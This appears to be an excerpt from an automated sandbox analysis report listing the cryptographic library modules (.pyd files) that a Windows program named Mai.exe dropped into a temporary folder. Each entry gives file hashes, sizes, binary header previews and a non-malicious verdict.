                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_pkcs1_decode.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):5.236167046748013
                                                          Encrypted:false
                                                          SSDEEP:192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
                                                          MD5:D9E7218460AEE693BEA07DA7C2B40177
                                                          SHA1:9264D749748D8C98D35B27BEFE6247DA23FF103D
                                                          SHA-256:38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
                                                          SHA-512:DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aes.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.558176937399355
                                                          Encrypted:false
                                                          SSDEEP:384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
                                                          MD5:F751792DF10CDEED391D361E82DAF596
                                                          SHA1:3440738AF3C88A4255506B55A673398838B4CEAC
                                                          SHA-256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
                                                          SHA-512:6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aesni.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15872
                                                          Entropy (8bit):5.285191078037458
                                                          Encrypted:false
                                                          SSDEEP:192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
                                                          MD5:BBEA5FFAE18BF0B5679D5C5BCD762D5A
                                                          SHA1:D7C2721795113370377A1C60E5CEF393473F0CC5
                                                          SHA-256:1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
                                                          SHA-512:0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d....e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_arc2.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):5.505471888568532
                                                          Encrypted:false
                                                          SSDEEP:192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
                                                          MD5:D2175300E065347D13211F5BF7581602
                                                          SHA1:3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
                                                          SHA-256:94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
                                                          SHA-512:6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_blowfish.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):20992
                                                          Entropy (8bit):6.06124024160806
                                                          Encrypted:false
                                                          SSDEEP:384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
                                                          MD5:45616B10ABE82D5BB18B9C3AB446E113
                                                          SHA1:91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
                                                          SHA-256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
                                                          SHA-512:ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cast.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):25088
                                                          Entropy (8bit):6.475467273446457
                                                          Encrypted:false
                                                          SSDEEP:384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
                                                          MD5:CF3C2F35C37AA066FA06113839C8A857
                                                          SHA1:39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
                                                          SHA-256:1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
                                                          SHA-512:1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cbc.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):4.838534302892255
                                                          Encrypted:false
                                                          SSDEEP:192:0F/1nb2mhQtkr+juOxKbDbnHcqgYvEkrK:u2f6iuOsbDtgYvEmK
                                                          MD5:20708935FDD89B3EDDEEA27D4D0EA52A
                                                          SHA1:85A9FE2C7C5D97FD02B47327E431D88A1DC865F7
                                                          SHA-256:11DD1B49F70DB23617E84E08E709D4A9C86759D911A24EBDDFB91C414CC7F375
                                                          SHA-512:F28C31B425DC38B5E9AD87B95E8071997E4A6F444608E57867016178CD0CA3E9F73A4B7F2A0A704E45F75B7DCFF54490510C6BF8461F3261F676E9294506D09B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cfb.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):4.9047185025862925
                                                          Encrypted:false
                                                          SSDEEP:192:NRgPX8lvI+KnwSDTPUDEhKWPXcqgzQkvEd:2og9rUD9mpgzQkvE
                                                          MD5:43BBE5D04460BD5847000804234321A6
                                                          SHA1:3CAE8C4982BBD73AF26EB8C6413671425828DBB7
                                                          SHA-256:FAA41385D0DB8D4EE2EE74EE540BC879CF2E884BEE87655FF3C89C8C517EED45
                                                          SHA-512:DBC60F1D11D63BEBBAB3C742FB827EFBDE6DFF3C563AE1703892D5643D5906751DB3815B97CBFB7DA5FCD306017E4A1CDCC0CDD0E61ADF20E0816F9C88FE2C9B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ctr.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14848
                                                          Entropy (8bit):5.300163691206422
                                                          Encrypted:false
                                                          SSDEEP:192:j0J1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDrdkrRcqgUF6+6vEX:jM01si8XSi3SACqe7tDeDgUUjvE
                                                          MD5:C6B20332B4814799E643BADFFD8DF2CD
                                                          SHA1:E7DA1C1F09F6EC9A84AF0AB0616AFEA55A58E984
                                                          SHA-256:61C7A532E108F67874EF2E17244358DF19158F6142680F5B21032BA4889AC5D8
                                                          SHA-512:D50C7F67D2DFB268AD4CF18E16159604B6E8A50EA4F0C9137E26619FD7835FAAD323B5F6A2B8E3EC1C023E0678BCBE5D0F867CD711C5CD405BD207212228B2B4
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..*B..*B..*B..R...*B..UC..*B.RC..*B..*C..*B..UG..*B..UF..*B..UA..*B..J..*B..B..*B....*B..@..*B.Rich.*B.........................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):57856
                                                          Entropy (8bit):4.260220483695234
                                                          Encrypted:false
                                                          SSDEEP:384:9XUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZNZY0JAIg+v:99HGHfJidSK
                                                          MD5:0B538205388FDD99A043EE3AFAA074E4
                                                          SHA1:E0DD9306F1DBE78F7F45A94834783E7E886EB70F
                                                          SHA-256:C4769D3E6EB2A2FECB5DEC602D45D3E785C63BB96297268E3ED069CC4A019B1A
                                                          SHA-512:2F4109E42DB7BC72EB50BCCC21EB200095312EA00763A255A38A4E35A77C04607E1DB7BB69A11E1D80532767B20BAA4860C05F52F32BF1C81FE61A7ECCEB35ED
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des3.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):58368
                                                          Entropy (8bit):4.276870967324261
                                                          Encrypted:false
                                                          SSDEEP:384:9jUqho9weF5/eHkRnYcZiGKdZHDL7idErZjZYXGg:9RCneH//id42
                                                          MD5:6C3E976AB9F47825A5BD9F73E8DBA74E
                                                          SHA1:4C6EB447FE8F195CF7F4B594CE7EAF928F52B23A
                                                          SHA-256:238CDB6B8FB611DB4626E6D202E125E2C174C8F73AE8A3273B45A0FC18DEA70C
                                                          SHA-512:B19516F00CC0484D9CDA82A482BBFE41635CDBBE19C13F1E63F033C9A68DD36798C44F04D6BD8BAE6523A845E852D81ACADD0D5DD86AF62CC9D081B803F8DF7B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ecb.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):10752
                                                          Entropy (8bit):4.578113904149635
                                                          Encrypted:false
                                                          SSDEEP:96:R0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwo2Pj15XkcX6gbW6z:DVddiT7pgTctEEI4qXDo11kcqgbW6
                                                          MD5:FEE13D4FB947835DBB62ACA7EAFF44EF
                                                          SHA1:7CC088AB68F90C563D1FE22D5E3C3F9E414EFC04
                                                          SHA-256:3E0D07BBF93E0748B42B1C2550F48F0D81597486038C22548224584AE178A543
                                                          SHA-512:DEA92F935BC710DF6866E89CC6EB5B53FC7ADF0F14F3D381B89D7869590A1B0B1F98F347664F7A19C6078E7AA3EB0F773FFCB711CC4275D0ECD54030D6CF5CB2
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_eksblowfish.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):6.143719741413071
                                                          Encrypted:false
                                                          SSDEEP:384:IUv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Q90gYP2lXCM:BKR8I+K0lDFQgLa17zU
                                                          MD5:76F88D89643B0E622263AF676A65A8B4
                                                          SHA1:93A365060E98890E06D5C2D61EFBAD12F5D02E06
                                                          SHA-256:605C86145B3018A5E751C6D61FD0F85CF4A9EBF2AD1F3009A4E68CF9F1A63E49
                                                          SHA-512:979B97AAC01633C46C048010FA886EBB09CFDB5520E415F698616987AE850FD342A4210A8DC0FAC1E059599F253565862892171403F5E4F83754D02D2EF3F366
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ocb.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17920
                                                          Entropy (8bit):5.353267174592179
                                                          Encrypted:false
                                                          SSDEEP:384:7PHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8bg6Vf4A:hPcnB8KSsB34cb+bcOYpMCBDX
                                                          MD5:D48BFFA1AF800F6969CFB356D3F75AA6
                                                          SHA1:2A0D8968D74EBC879A17045EFE86C7FB5C54AEE6
                                                          SHA-256:4AA5E9CE7A76B301766D3ECBB06D2E42C2F09D0743605A91BF83069FEFE3A4DE
                                                          SHA-512:30D14AD8C68B043CC49EAFB460B69E83A15900CB68B4E0CBB379FF5BA260194965EF300EB715308E7211A743FF07FA7F8779E174368DCAA7F704E43068CC4858
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ofb.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):4.741247880746506
                                                          Encrypted:false
                                                          SSDEEP:192:0F/1nb2mhQtkgU7L9D037tfcqgYvEJPb:u2f6L9DSJxgYvEJj
                                                          MD5:4D9182783EF19411EBD9F1F864A2EF2F
                                                          SHA1:DDC9F878B88E7B51B5F68A3F99A0857E362B0361
                                                          SHA-256:C9F4C5FFCDD4F8814F8C07CE532A164AB699AE8CDE737DF02D6ECD7B5DD52DBD
                                                          SHA-512:8F983984F0594C2CAC447E9D75B86D6EC08ED1C789958AFA835B0D1239FD4D7EBE16408D080E7FCE17C379954609A93FC730B11BE6F4A024E7D13D042B27F185
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2b.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14848
                                                          Entropy (8bit):5.212941287344097
                                                          Encrypted:false
                                                          SSDEEP:192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
                                                          MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
                                                          SHA1:8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
                                                          SHA-256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
                                                          SHA-512:7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`..........................................9......|:..d....`.......P..@............p..,....3...............................2..@............0...............................text...X........................... ..`.rdata.......0....... ..............@..@.data...8....@.......0..............@....pdata..@....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2s.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14336
                                                          Entropy (8bit):5.181291194389683
                                                          Encrypted:false
                                                          SSDEEP:192:hF/1nb2mhQt7fSOp/CJPvADQHKtxSOvbcqgEvcM+:N2fNKOZWPIDnxVlgEvL
                                                          MD5:9D28433EA8FFBFE0C2870FEDA025F519
                                                          SHA1:4CC5CF74114D67934D346BB39CA76F01F7ACC3E2
                                                          SHA-256:FC296145AE46A11C472F99C5BE317E77C840C2430FBB955CE3F913408A046284
                                                          SHA-512:66B4D00100D4143EA72A3F603FB193AFA6FD4EFB5A74D0D17A206B5EF825E4CC5AF175F5FB5C40C022BDE676BA7A83087CB95C9F57E701CA4E7F0A2FCE76E599
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`.........................................09.......9..d....`.......P..@............p..,....3...............................2..@............0...............................text...8........................... ..`.rdata..4....0......................@..@.data...8....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B........................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD2.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14336
                                                          Entropy (8bit):5.140195114409974
                                                          Encrypted:false
                                                          SSDEEP:192:RsiHXqpo0cUp8XnUp8XjEQnlDtJI6rcqgcx2:f6DcUp8XUp8AclDA69gcx2
                                                          MD5:8A92EE2B0D15FFDCBEB7F275154E9286
                                                          SHA1:FA9214C8BBF76A00777DFE177398B5F52C3D972D
                                                          SHA-256:8326AE6AD197B5586222AFA581DF5FE0220A86A875A5E116CB3828E785FBF5C2
                                                          SHA-512:7BA71C37AAF6CB10FC5C595D957EB2846032543626DE740B50D7CB954FF910DCF7CEAA56EB161BAB9CC1F663BADA6CA71973E6570BAC7D6DA4D4CC9ED7C6C3DA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......0:..d....`.......P..(............p..,....4...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD4.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13824
                                                          Entropy (8bit):5.203867759982304
                                                          Encrypted:false
                                                          SSDEEP:192:WsiHXqpwUiv6wPf+4WVrd1DFrCqwWwcqgfvE:s6biio2Pd1DFmlgfvE
                                                          MD5:FE16E1D12CF400448E1BE3FCF2D7BB46
                                                          SHA1:81D9F7A2C6540F17E11EFE3920481919965461BA
                                                          SHA-256:ADE1735800D9E82B787482CCDB0FBFBA949E1751C2005DCAE43B0C9046FE096F
                                                          SHA-512:A0463FF822796A6C6FF3ACEBC4C5F7BA28E7A81E06A3C3E46A0882F536D656D3F8BAF6FB748008E27F255FE0F61E85257626010543FC8A45A1E380206E48F07C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
